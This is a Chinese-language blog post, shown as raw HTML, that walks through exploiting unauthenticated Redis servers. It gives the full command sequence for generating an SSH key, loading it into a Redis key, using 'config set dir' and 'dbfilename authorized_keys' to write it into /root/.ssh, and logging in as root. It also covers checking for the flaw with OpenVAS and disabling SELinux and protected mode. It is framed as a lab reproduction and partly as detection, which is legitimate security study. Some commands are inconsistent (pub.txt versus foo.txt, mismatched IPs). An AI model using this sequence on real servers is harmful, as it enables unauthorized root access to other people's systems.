<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>redis未授权访问漏洞 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="redis是什么redis是一个高性能的key-value数据库,开源,遵守BSD协议。 BSD协议BSD开源协议是一个给于使用者很大自由的协议。可以自由的使用，修改源代码，也可以将修改后的代码作为开源或者专有软件再发布。 redis特点 Redis支持数据的持久化，可以将内存中的数据保存在磁盘中，重启的  时候可以再次加载进行使用。 Redis不仅仅支持简单的key-value类型的数据，同时还">
<meta name="keywords" content="redis,未授权访问">
<meta property="og:type" content="article">
<meta property="og:title" content="redis未授权访问漏洞">
<meta property="og:url" content="http://yoursite.com/2018/03/19/Redise未授权访问漏洞/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="redis是什么redis是一个高性能的key-value数据库,开源,遵守BSD协议。 BSD协议BSD开源协议是一个给于使用者很大自由的协议。可以自由的使用，修改源代码，也可以将修改后的代码作为开源或者专有软件再发布。 redis特点 Redis支持数据的持久化，可以将内存中的数据保存在磁盘中，重启的  时候可以再次加载进行使用。 Redis不仅仅支持简单的key-value类型的数据，同时还">
<meta property="og:image" content="http://yoursite.com/2018/03/19/Redise未授权访问漏洞/2018/03/19/Redise未授权访问漏洞/图片.png">
<meta property="og:updated_time" content="2018-03-19T12:25:10.020Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="redis未授权访问漏洞">
<meta name="twitter:description" content="redis是什么redis是一个高性能的key-value数据库,开源,遵守BSD协议。 BSD协议BSD开源协议是一个给于使用者很大自由的协议。可以自由的使用，修改源代码，也可以将修改后的代码作为开源或者专有软件再发布。 redis特点 Redis支持数据的持久化，可以将内存中的数据保存在磁盘中，重启的  时候可以再次加载进行使用。 Redis不仅仅支持简单的key-value类型的数据，同时还">
<meta name="twitter:image" content="http://yoursite.com/2018/03/19/Redise未授权访问漏洞/2018/03/19/Redise未授权访问漏洞/图片.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
  

</head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-Redise未授权访问漏洞" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2018/03/19/Redise未授权访问漏洞/" class="article-date">
  <time datetime="2018-03-19T12:24:51.348Z" itemprop="datePublished">2018-03-19</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      redis未授权访问漏洞
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="redis是什么"><a href="#redis是什么" class="headerlink" title="redis是什么"></a>redis是什么</h2><p>redis是一个高性能的key-value数据库,开源,遵守BSD协议。</p>
<h3 id="BSD协议"><a href="#BSD协议" class="headerlink" title="BSD协议"></a>BSD协议</h3><p>BSD开源协议是一个给于使用者很大自由的协议。可以自由的使用，修改源代码，也可以将修改后的代码作为开源或者专有软件再发布。</p>
<h3 id="redis特点"><a href="#redis特点" class="headerlink" title="redis特点"></a>redis特点</h3><ul>
<li>Redis支持数据的持久化，可以将内存中的数据保存在磁盘中，重启的  时候可以再次加载进行使用。</li>
<li>Redis不仅仅支持简单的key-value类型的数据，同时还提供list，set，zset，hash等数据结构的存储。</li>
<li>Redis支持数据的备份，即master-slave模式的数据备份。<br>BSD协议<h3 id="redis未授权访问漏洞"><a href="#redis未授权访问漏洞" class="headerlink" title="redis未授权访问漏洞"></a>redis未授权访问漏洞</h3><h3 id="漏洞的影响"><a href="#漏洞的影响" class="headerlink" title="漏洞的影响"></a>漏洞的影响</h3>攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法，可以成功在 Redis 服务器上写入公钥，进而可以使用对应私钥直接登录目标服务器。<h3 id="漏洞产生的原因"><a href="#漏洞产生的原因" class="headerlink" title="漏洞产生的原因"></a>漏洞产生的原因</h3>Redis 服务暴露到公网上，如果在没有开启认证的情况下，可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。<h3 id="公钥登陆"><a href="#公钥登陆" class="headerlink" title="公钥登陆"></a>公钥登陆</h3>用户将自己的SSH公钥储存在远程主机上。登录的时候，远程主机会向用户发送一段随机字符串，用户用自己的私钥加密后，再发回来。远程主机用事先储存的公钥进行解密，如果成功，就证明用户是可信的，允许直接登录shell，不再要求密码。<img src="/2018/03/19/Redise未授权访问漏洞/2018/03/19/Redise未授权访问漏洞/图片.png">
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3>即只要向目标机器~/.ssh/authorized_keys的文件写入自己的公钥，就可以直接登陆目标机器的shell。<h2 id="渗透场景"><a href="#渗透场景" class="headerlink" title="渗透场景"></a>渗透场景</h2></li>
</ul>
<h2 id="漏洞的重现和利用"><a href="#漏洞的重现和利用" class="headerlink" title="漏洞的重现和利用"></a>漏洞的重现和利用</h2><h3 id="漏洞环境搭建"><a href="#漏洞环境搭建" class="headerlink" title="漏洞环境搭建"></a>漏洞环境搭建</h3><ol>
<li>安装和启动redis服务<br>在win10下的虚拟机fedora26<br>安装redis时默认会将redis绑定在0.0.0.0：6397<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span> yum install redis*</span><br><span class="line"><span class="meta">$</span> redis-server</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>2.安装ssh<br>linux中默认自带ssh<br>需要启动ssh<br><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span> service sshd start</span><br></pre></td></tr></table></figure></p>
<p>3.配置ssh<br>在.ssh目录下，获得公钥和私钥，将公钥前后加入两空行写入pub.txt文件中.<br>最后将pub.txt的内容连接到目标机器redis服务中键名为crackit的键值中，假设目标机器ip为：192.168.1.1<br><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span> cd /root/.ssh</span><br><span class="line"><span class="meta">$</span> ssh-keygen –t rsa</span><br><span class="line"><span class="meta">$</span> (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") &gt; pub.txt</span><br><span class="line"><span class="meta">$</span> cat foo.txt | redis-cli -h 192.168.1.1 -x set crackit</span><br></pre></td></tr></table></figure></p>
<h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><p>连接reids服务<br>就跟redis的数据库文件保存路径<br>将前面保存的键值crackit加入”authorized_keys“末尾<br><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span> redis-cli -h 192.168.1.11</span><br><span class="line"><span class="meta">$</span> config set dir /root/.ssh/</span><br><span class="line">查看是否修改成功</span><br><span class="line"><span class="meta">$</span> config get dir</span><br><span class="line"><span class="meta">$</span> config set dbfilename "authorized_keys"</span><br><span class="line">获取当前数据库文件</span><br><span class="line"><span class="meta">$</span> config get dbfilename</span><br><span class="line"><span class="meta">$</span> save</span><br></pre></td></tr></table></figure></p>
<p>配置完后，就可以直接使用自己的私钥连接目标机器了</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span> ssh –i id_rsa root@192.168.1.1</span><br></pre></td></tr></table></figure>
<h2 id="使用openvas验证"><a href="#使用openvas验证" class="headerlink" title="使用openvas验证"></a>使用openvas验证</h2>
<p>漏洞名称为Redis Server no password<br><br>根据openvas<br>漏洞产生的原因：是因为没有使用密码对Redis进行保护<br>检查漏洞的方法：连接远程的redis服务器查看它是否存在密码</p>
<h3 id="查看扫描脚本nvt"><a href="#查看扫描脚本nvt" class="headerlink" title="查看扫描脚本nvt"></a>查看扫描脚本nvt</h3><p>NVT:Network Vulnerability Test网络漏洞测试<br>一个网络漏洞测试程序，用于检查目标系统是否存在一个特定的已知或潜在安全问题。<br>NVT在目录/var/lib/openvas/plugins/<br>根据扫描结果中的OID值可以在中找到NVT文件位置<a href="http://www.openvas.org/openvas-nvt-feed.html" target="_blank" rel="noopener">http://www.openvas.org/openvas-nvt-feed.html</a><br><br><br>脚本扫描原理获取redis使用端口号，查看redis是否具有密码如果redis没有密码则存在相关漏洞</p>
<h2 id="注意"><a href="#注意" class="headerlink" title="注意"></a>注意</h2><p>1.需要关闭SElinux<br>修改/etc/selinux/config 文件<br>将SELINUX=enforcing改为SELINUX=disabled<br>重启<br>2.redis默认开启了protected mode<br>在将公钥存在redis键中时会拒绝操作<br>使用提示中给出的临时改变配置的方法redis-server –proteced-mode no的方法关闭该模式。<br>3.只能获取到启动redis-server的用户权限<br>即如果是普通用户启动redis服务可能，入侵者就没有办法权限修改authorized_keys文件<br>  [1]: ./images/%E5%9B%BE%E7%89%871.png “图片1”<br>  [2]: ./images/%E5%9B%BE%E7%89%871_1.png “图片1”<br>  [3]: ./images/%E5%9B%BE%E7%89%872.png “图片2”<br>  [4]: ./images/%E5%9B%BE%E7%89%873.png “图片3”<br>  [5]: ./images/%E5%9B%BE%E7%89%874.png “图片4”</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2018/03/19/Redise未授权访问漏洞/" data-id="cjey7i5fb0001h8ah32wnblg9" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/redis-未授权访问/">redis,未授权访问</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2018/03/19/redis未授权访问漏洞/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          redis未授权访问漏洞
        
      </div>
    </a>
  
  
    <a href="/2018/03/17/hello-xblog/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">hello,xblog</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/redis-未授权访问/">redis,未授权访问</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/redis-未授权访问/" style="font-size: 10px;">redis,未授权访问</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/03/">March 2018</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2018/03/19/redis未授权访问漏洞/">redis未授权访问漏洞</a>
          </li>
        
          <li>
            <a href="/2018/03/19/Redise未授权访问漏洞/">redis未授权访问漏洞</a>
          </li>
        
          <li>
            <a href="/2018/03/17/hello-xblog/">hello,xblog</a>
          </li>
        
          <li>
            <a href="/2018/03/17/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2018 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>

  </div>
</body>
</html>